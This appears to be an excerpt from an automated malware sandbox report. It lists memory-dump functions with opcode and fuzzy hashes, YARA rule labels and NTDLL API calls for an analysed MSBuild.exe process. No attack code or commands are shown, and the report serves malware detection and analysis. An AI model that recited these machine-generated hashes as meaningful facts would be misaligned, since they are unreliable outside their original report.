                                                                                          • Instruction Fuzzy Hash: FCC10B74D1520ADFCB04CF96C4818AEFBB6FF89302B14D56AD815AB365D734A942CFA0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C75018, Relevance: 1.4, Strings: 1, Instructions: 186COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: -xaM
                                                                                          • API String ID: 0-1568011996
                                                                                          • Opcode ID: 37ce6d6d81110cd7048475fe1ffe36f380a4202d8d5011fe161ce5ed4a8522ab
                                                                                          • Instruction ID: 99d1a7211e6d54e3e458549da925b9b9a8c8f98faf4be1cfe69a2a6c6c98086c
                                                                                          • Opcode Fuzzy Hash: 37ce6d6d81110cd7048475fe1ffe36f380a4202d8d5011fe161ce5ed4a8522ab
                                                                                          • Instruction Fuzzy Hash: FB81D4B4E01248CFDB08CFA9C884A9DBBB2FF89301F14842AD415AB365DB355905CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C75030, Relevance: 1.4, Strings: 1, Instructions: 183COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: -xaM
                                                                                          • API String ID: 0-1568011996
                                                                                          • Opcode ID: 51aba39ceb2f72239ab5d41e7c86216978a38ef853d108145001e5bf13a3cae3
                                                                                          • Instruction ID: df113e805f350eb0c543a0c6178126de9e836b514aa626cd6472292b3b124e6c
                                                                                          • Opcode Fuzzy Hash: 51aba39ceb2f72239ab5d41e7c86216978a38ef853d108145001e5bf13a3cae3
                                                                                          • Instruction Fuzzy Hash: BE81C2B4E11208DFDB08CFE9C984AAEBBB2FF88301F10842AD419AB354DB755906CF55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C794A0, Relevance: 1.4, Strings: 1, Instructions: 173COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: MW0
                                                                                          • API String ID: 0-3214648272
                                                                                          • Opcode ID: 3c6337466930e6a563ef69649f3004ab21cc4b9f87f9860d2d2b9b574dfc127b
                                                                                          • Instruction ID: 1637e0507774255741bd9f5b9d7b21a8c885808b83375dac0cb77fd93a23bd72
                                                                                          • Opcode Fuzzy Hash: 3c6337466930e6a563ef69649f3004ab21cc4b9f87f9860d2d2b9b574dfc127b
                                                                                          • Instruction Fuzzy Hash: B371F775E1520ACFCB08CFAAD5805DEFBF2FF89211F14A52AD416B7314E3349A458B64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C79490, Relevance: 1.4, Strings: 1, Instructions: 170COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: MW0
                                                                                          • API String ID: 0-3214648272
                                                                                          • Opcode ID: 0df6c941e3821059849678168a9a0f6daa1044b25a3d3dc10171989ef3b0a3b4
                                                                                          • Instruction ID: cb57ebaf998a13641ee24fc66c303069ed4d60dfbbee16465af5d451d4562b8c
                                                                                          • Opcode Fuzzy Hash: 0df6c941e3821059849678168a9a0f6daa1044b25a3d3dc10171989ef3b0a3b4
                                                                                          • Instruction Fuzzy Hash: 7D71F775E1520ACFCB44CFAAC5805DEFBF2FF89211F28A52AD406B7314E3349A458B64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C77D20, Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: p,U
                                                                                          • API String ID: 0-3030774698
                                                                                          • Opcode ID: 0210fb838fdf144b7d2ae8d411e5abde86013142da20575094e2f54d83a56006
                                                                                          • Instruction ID: 7c5c5e0b4109630e57ad10f5f79b9e22025c73045bc8741e57b4f79b5da37fae
                                                                                          • Opcode Fuzzy Hash: 0210fb838fdf144b7d2ae8d411e5abde86013142da20575094e2f54d83a56006
                                                                                          • Instruction Fuzzy Hash: CF514C70E0560EDFCB08CFA9C8805AEFBB2FB99301F14D5AAC415A7355DB749A42CB51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C75829, Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: )DA(
                                                                                          • API String ID: 0-1463471114
                                                                                          • Opcode ID: b912f4b0dba7a2ff5221c1ba3e0b8904df24a2ec9c9b68c83d491131784853a2
                                                                                          • Instruction ID: 559a3bf798a070f81caccc646dda8e137f60979ddf77e8a4b313b3f380b2f741
                                                                                          • Opcode Fuzzy Hash: b912f4b0dba7a2ff5221c1ba3e0b8904df24a2ec9c9b68c83d491131784853a2
                                                                                          • Instruction Fuzzy Hash: 6D510A74E042199FDB08CFAAC8416AEFBF2FF89301F24C16AD415A7355D7345A42CB55
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C75838, Relevance: 1.4, Strings: 1, Instructions: 137COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: )DA(
                                                                                          • API String ID: 0-1463471114
                                                                                          • Opcode ID: 4000c6b11d5da9e0bc8b0fd3d06a66e88faf8388b8de1d072955be1abe1cbf46
                                                                                          • Instruction ID: 1e936421ecff8795a4b7fc67601e69778b1df724aac2cb5f766c60b7c23c3563
                                                                                          • Opcode Fuzzy Hash: 4000c6b11d5da9e0bc8b0fd3d06a66e88faf8388b8de1d072955be1abe1cbf46
                                                                                          • Instruction Fuzzy Hash: D751E7B4E04219DFDB08CFAAC4416AEFBF2FB88301F24D12AD519B7355D7345A428B64
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C744E0, Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: x*:U
                                                                                          • API String ID: 0-2227040091
                                                                                          • Opcode ID: a01c509155c4af81c16b519a95ad62696e85c2925cb8b6f8813856d382d62674
                                                                                          • Instruction ID: 2bf57c0ed8b06adabe41ada01eeef7cd39b5c55a3e06a0f02c1d477c4b3fc712
                                                                                          • Opcode Fuzzy Hash: a01c509155c4af81c16b519a95ad62696e85c2925cb8b6f8813856d382d62674
                                                                                          • Instruction Fuzzy Hash: 5E319771E016589BEB58CFABD84069EFAF7ABC8300F14C1BAD819A7255DB304A458F52
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C744D1, Relevance: 1.3, Strings: 1, Instructions: 77COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: x*:U
                                                                                          • API String ID: 0-2227040091
                                                                                          • Opcode ID: 0e1d9262710b7b9d0b9f7abb8a8901350e92297bfed45ae5d14de88325586d5e
                                                                                          • Instruction ID: a2107eee4a567b5340f576df2a4b4aa11436a0d8433230be674c4573f66a42f6
                                                                                          • Opcode Fuzzy Hash: 0e1d9262710b7b9d0b9f7abb8a8901350e92297bfed45ae5d14de88325586d5e
                                                                                          • Instruction Fuzzy Hash: E631DAB1E016588FEB58CFAAC84069EFBF3AFC8300F14C0BAD418A7255DB300A458F12
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 04D84580, Relevance: .4, Instructions: 378COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.246421106.0000000004D80000.00000040.00000001.sdmp, Offset: 04D80000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 4fb935b83e5b0d806f747a99bb68cb5ad1bc19fc1e3115c1f9e7d8fb428592c5
                                                                                          • Instruction ID: dec4221038328d28a7a7e546fbea186e25ba850c73c0bacec71a288b6cfe8986
                                                                                          • Opcode Fuzzy Hash: 4fb935b83e5b0d806f747a99bb68cb5ad1bc19fc1e3115c1f9e7d8fb428592c5
                                                                                          • Instruction Fuzzy Hash: 90D19D3170165A8FDB25EBB5C460BBEB7F6AF8A304F1444ADD146DB290EB34E901CB61
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 0159E618, Relevance: .3, Instructions: 315COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cec5a5c5ec0fbdcb70817e344a525e87f25a8bb71821db85436602a288a86858
                                                                                          • Instruction ID: ca6aa27c87738444694ae3b08fa2fa9c778aac22792e79a333b854b002722bcf
                                                                                          • Opcode Fuzzy Hash: cec5a5c5ec0fbdcb70817e344a525e87f25a8bb71821db85436602a288a86858
                                                                                          • Instruction Fuzzy Hash: F312C9F1CD17468AD310CF66E59C3A93BA1B7443A8FF04B08D2A15B6D2D7B6116ACF44
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 0159BC74, Relevance: .3, Instructions: 265COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8fdd0c82fb92c2defe3cc059bc53ac82e15fd9666a24373e87f47d3ff2523d20
                                                                                          • Instruction ID: 6ff522f8486ba28cfe293b55c1574493e699885c2d04227c5fc9e8dfdde6552e
                                                                                          • Opcode Fuzzy Hash: 8fdd0c82fb92c2defe3cc059bc53ac82e15fd9666a24373e87f47d3ff2523d20
                                                                                          • Instruction Fuzzy Hash: 75A16F32E0021A8FDF05DFB5D9449EEBBB2FF85300B15856AE905BF261EB31A915CB41
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 0159E608, Relevance: .2, Instructions: 223COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.244633219.0000000001590000.00000040.00000001.sdmp, Offset: 01590000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: cf2a589244d9ff5ef81109c55782a0b476a894d948836ee88655d320d63fcaa2
                                                                                          • Instruction ID: 11aaf22bcac7b3af1aab516b12721903b1a3c57363b772f060c095bbbdddf97a
                                                                                          • Opcode Fuzzy Hash: cf2a589244d9ff5ef81109c55782a0b476a894d948836ee88655d320d63fcaa2
                                                                                          • Instruction Fuzzy Hash: FFC11DF1C917468AD710CF66E88C3993B71BB853A8FF04B08D2616B6D1D7B6106ACF44
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C75CC0, Relevance: .2, Instructions: 193COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: aa477522b5b0702f9db50b8d644733a3fff7bf238eecd5604278b743142a3216
                                                                                          • Instruction ID: 1bf7eafbc72eb140fe5fc2b48ba52a4123531c70b475490b107fae7df2cbf2c3
                                                                                          • Opcode Fuzzy Hash: aa477522b5b0702f9db50b8d644733a3fff7bf238eecd5604278b743142a3216
                                                                                          • Instruction Fuzzy Hash: D8816C74E1420ADFCB04CFA6D5859AEFBB1FF88311F24856AE815AB354D3349A42CF90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 04D80007, Relevance: .2, Instructions: 189COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.246421106.0000000004D80000.00000040.00000001.sdmp, Offset: 04D80000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c2dce39a5aaae3e13bb02f5f77ae41c33f9f377c6479826a1dd6fc7e9d250f36
                                                                                          • Instruction ID: fcb26b53fbf7e4e8513e0a2ddeda55c4410aef911576a8895e6c2f9a007555fe
                                                                                          • Opcode Fuzzy Hash: c2dce39a5aaae3e13bb02f5f77ae41c33f9f377c6479826a1dd6fc7e9d250f36
                                                                                          • Instruction Fuzzy Hash: 64715874E052098FCB05DFAAD8805AEBFF2FF89300F11946AD415EB354D6349A06DF95
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 04D80040, Relevance: .2, Instructions: 173COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.246421106.0000000004D80000.00000040.00000001.sdmp, Offset: 04D80000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c05cce81a83411cecdd603c8aa3d4baa589660ee70acb47c515682334c05b1b9
                                                                                          • Instruction ID: d41837815464083f55a057ceb3a3b0a159db7ac0c2b0e7fb9c7a44866d20735a
                                                                                          • Opcode Fuzzy Hash: c05cce81a83411cecdd603c8aa3d4baa589660ee70acb47c515682334c05b1b9
                                                                                          • Instruction Fuzzy Hash: 5E612474E1520ADFCB04DFAAD8815AEFBF2FB88340F10952AD415B7344E734AA069F95
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C7C190, Relevance: .2, Instructions: 172COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7efb381eb72d58dc097632d6814e0f3e1f66691b3f5e45ae9044ccb7539ce677
                                                                                          • Instruction ID: 0a9a9e29f9658922bbed359059dec221b7bf88f8cdce6b955ddc85cfa3aa0b82
                                                                                          • Opcode Fuzzy Hash: 7efb381eb72d58dc097632d6814e0f3e1f66691b3f5e45ae9044ccb7539ce677
                                                                                          • Instruction Fuzzy Hash: 90611A70E1520ADFCB04CFEAD581AEEFBB2AF88351F14D426D425A7354D7349A419FA0
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C75CD0, Relevance: .2, Instructions: 171COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: d12b33e0ba9ac5f954127a8c02230a52cc34f8dab1cfa4a0f5772ba9d8f035cf
                                                                                          • Instruction ID: c6ba5e43618baa45b8209db58934dd6416403e5f9dd7204b676eaace109ca410
                                                                                          • Opcode Fuzzy Hash: d12b33e0ba9ac5f954127a8c02230a52cc34f8dab1cfa4a0f5772ba9d8f035cf
                                                                                          • Instruction Fuzzy Hash: 4C7127B4E15209DFCB04CF9AD5859AEFBB2FF88351F10952AE415AB314D3349A42CF94
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C7AD40, Relevance: .2, Instructions: 163COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c98625d91a079d0fa465704f6d1e05c5156de2feefaf313451076db82a3c7f04
                                                                                          • Instruction ID: b2676ba188dcff7b4278be921f9883c69519f34073ff732c30a39d3d1c7c7c96
                                                                                          • Opcode Fuzzy Hash: c98625d91a079d0fa465704f6d1e05c5156de2feefaf313451076db82a3c7f04
                                                                                          • Instruction Fuzzy Hash: 54613A70E11229DFDB04CFA9D981A9EFBF2BB88301F24C569D408A7355DB309A42CF65
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C7C460, Relevance: .2, Instructions: 158COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f112093903debb88d530336179836a757c537466ec426c4feffc9627009b7eb3
                                                                                          • Instruction ID: 12e968c97a4baf8f859525d4d25bc32d7485d1bed059e835c20b1925404f57e1
                                                                                          • Opcode Fuzzy Hash: f112093903debb88d530336179836a757c537466ec426c4feffc9627009b7eb3
                                                                                          • Instruction Fuzzy Hash: 1861E974E05219CFDB28CFA9D880AAEFBB2FF88301F1080A9D509A7315DB309A41CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C77850, Relevance: .1, Instructions: 122COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 35570610c196768aca94d257468e63c2593aab2b7fae114ac1ceaba47469967a
                                                                                          • Instruction ID: 0ca8f83fa2faeaf396d8a261955e3b37cd54b8ea1e70fc9dcb5f8def8e722b27
                                                                                          • Opcode Fuzzy Hash: 35570610c196768aca94d257468e63c2593aab2b7fae114ac1ceaba47469967a
                                                                                          • Instruction Fuzzy Hash: E0415A74E05249EFCB44CFAAC58099EFFF2EF89210F24C5AAD415AB365D7309A01DB51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C79928, Relevance: .1, Instructions: 65COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: aa92a1c0657175fc7f021935a05db653eaf93bdbe097514349592b95e41f9df2
                                                                                          • Instruction ID: ec9eacf311a59ffac1da9d67cc303ec29a99391340bc73bc32b2cc677fac4903
                                                                                          • Opcode Fuzzy Hash: aa92a1c0657175fc7f021935a05db653eaf93bdbe097514349592b95e41f9df2
                                                                                          • Instruction Fuzzy Hash: 3421A875E016189BEB58CFABDC4079EFBF7AFC8201F04C57AC408A6264EB3459468F51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 08C79919, Relevance: .1, Instructions: 60COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.249045699.0000000008C70000.00000040.00000001.sdmp, Offset: 08C70000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 0b3a91b9f48688cb9149dc7eca1fd8f1b2410269e1ba8439b94173ba85d32f4e
                                                                                          • Instruction ID: c353808118c7d708680358d7f4a40fa67a5956684464cde351e31e5108d23eec
                                                                                          • Opcode Fuzzy Hash: 0b3a91b9f48688cb9149dc7eca1fd8f1b2410269e1ba8439b94173ba85d32f4e
                                                                                          • Instruction Fuzzy Hash: 1D21CC75E056189BEB5CCF6BD84169EFBF3AFC9200F08C1BAC808A6264EB344556CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Analysis Process: MSBuild.exe PID: 6592 Parent PID: 6352 MSBuild.exeCOMMON

                                                                                          Executed Functions

                                                                                          Function 00F460B0, Relevance: 2.3, APIs: 1, Instructions: 760libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.500008358.0000000000F40000.00000040.00000001.sdmp, Offset: 00F40000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 791f93cb7350bf595a0df34f15ceaa7e7fbcd3a5518b195111074f9da36e22a7
                                                                                          • Instruction ID: 5ac98c7ba26ca41cf941e8100f3f17749dc1064196224e7c0fd05434718ae4f9
                                                                                          • Opcode Fuzzy Hash: 791f93cb7350bf595a0df34f15ceaa7e7fbcd3a5518b195111074f9da36e22a7
                                                                                          • Instruction Fuzzy Hash: 8362F771E046188FCB24EF78C85469DB7F2AF89310F1185AAD54AEB255EF309E85CF81
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00B55598, Relevance: 1.7, APIs: 1, Instructions: 180libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.496139536.0000000000B50000.00000040.00000001.sdmp, Offset: 00B50000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 5d3526de23b89953cb91b2a9f82b4ccc2f028eab9bd830be083a6e17214cac68
                                                                                          • Instruction ID: 713da80404f9f627906a6ab5caf4f64cf547271edf226284afd03af9a21ffb25
                                                                                          • Opcode Fuzzy Hash: 5d3526de23b89953cb91b2a9f82b4ccc2f028eab9bd830be083a6e17214cac68
                                                                                          • Instruction Fuzzy Hash: FF612F34A04609DFDB24EFB4D8597AE77F6EF88306F1084A8D806A7294DF749D45CB90
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E10A70, Relevance: 7.0, APIs: 4, Instructions: 955libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL ref: 00E10EFD
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                                                          • String ID:
                                                                                          • API String ID: 243558500-0
                                                                                          • Opcode ID: ad11ceeb9ec9770670f21db180621a27b5c591a1529395d9e711221ebf1fbc80
                                                                                          • Instruction ID: d41c0412d874f731c8086fedd0705961fd2e0f4e4a1099e1976c0869834bf6eb
                                                                                          • Opcode Fuzzy Hash: ad11ceeb9ec9770670f21db180621a27b5c591a1529395d9e711221ebf1fbc80
                                                                                          • Instruction Fuzzy Hash: ECA22674A08228CFCB64DF74D89869DB7B6BF49305F1080EAD60AA3254DF359E81CF50
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E10A91, Relevance: 6.6, APIs: 4, Instructions: 631libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL ref: 00E10EFD
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                                                          • String ID:
                                                                                          • API String ID: 243558500-0
                                                                                          • Opcode ID: 4f74c00b503631ffbc3f1912fa03d6b7461e87e36f12f3ccdaa4276dca13ec33
                                                                                          • Instruction ID: c9cbad754717a0aade3f51926441a9406a4916af70a0b990edbdf362152a5574
                                                                                          • Opcode Fuzzy Hash: 4f74c00b503631ffbc3f1912fa03d6b7461e87e36f12f3ccdaa4276dca13ec33
                                                                                          • Instruction Fuzzy Hash: AD520574A0922CCFCB249F74D89869DB7B6BF49305F2090EAD60AA7244DF359E81CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E10AD6, Relevance: 6.6, APIs: 4, Instructions: 622libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL ref: 00E10EFD
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                                                          • String ID:
                                                                                          • API String ID: 243558500-0
                                                                                          • Opcode ID: b74d47208b0007ac6c7d7264c94313c5dec0b6cc2271d3b2a66fe8dce1d18bdc
                                                                                          • Instruction ID: eaec046faeefdaaaf8756a5a2d3b967eaddf43b7d0a2911b217deabd40044228
                                                                                          • Opcode Fuzzy Hash: b74d47208b0007ac6c7d7264c94313c5dec0b6cc2271d3b2a66fe8dce1d18bdc
                                                                                          • Instruction Fuzzy Hash: 65521674A0921CCFCB249F74D8986ADB7B6BF49305F2090EAD60AA7244DF359E81CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E10B12, Relevance: 6.6, APIs: 4, Instructions: 617libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL ref: 00E10EFD
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                                                          • String ID:
                                                                                          • API String ID: 243558500-0
                                                                                          • Opcode ID: e6eb00e33bcf23b130969aef2603ffdd9e50d1d4aeac4dc7e3a92b44f9423f1e
                                                                                          • Instruction ID: 5e06885d7324a363a27fa9cd82ac80893e10dcd378be00076cc022f1f747e434
                                                                                          • Opcode Fuzzy Hash: e6eb00e33bcf23b130969aef2603ffdd9e50d1d4aeac4dc7e3a92b44f9423f1e
                                                                                          • Instruction Fuzzy Hash: 12520674A0921CCFCB249F74D8986ADB7B6BF49305F2090EAD60AA7244DF358E81CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E10B57, Relevance: 6.6, APIs: 4, Instructions: 610libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL ref: 00E10EFD
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.499828062.0000000000E10000.00000040.00000001.sdmp, Offset: 00E10000, based on PE: false
                                                                                          Similarity
                                                                                          • API ID: DispatcherExceptionInitializeThunkUser
                                                                                          • String ID:
                                                                                          • API String ID: 243558500-0
                                                                                          • Opcode ID: 329fa23a2e64086265f6ddbc6137331f3eeb4cbe769bd87c80ca4c068dbfbf8e
                                                                                          • Instruction ID: 720e7e8f7600401703f41085d187c97c6300a2e3adfff2e6c7ed256f9c2f86f7
                                                                                          • Opcode Fuzzy Hash: 329fa23a2e64086265f6ddbc6137331f3eeb4cbe769bd87c80ca4c068dbfbf8e
                                                                                          • Instruction Fuzzy Hash: E9521674A0921CCFCB249F74D8986ADB7B6BF49305F2090EAD60AA7244DF358E81CF51
                                                                                          Uniqueness

                                                                                          Uniqueness Score: -1.00%

                                                                                          Function 00E10B9C, Relevance: 6.6, APIs: 4, Instructions: 603libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LdrInitializeThunk.NTDLL ref: 00E10EFD
                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 00E11538
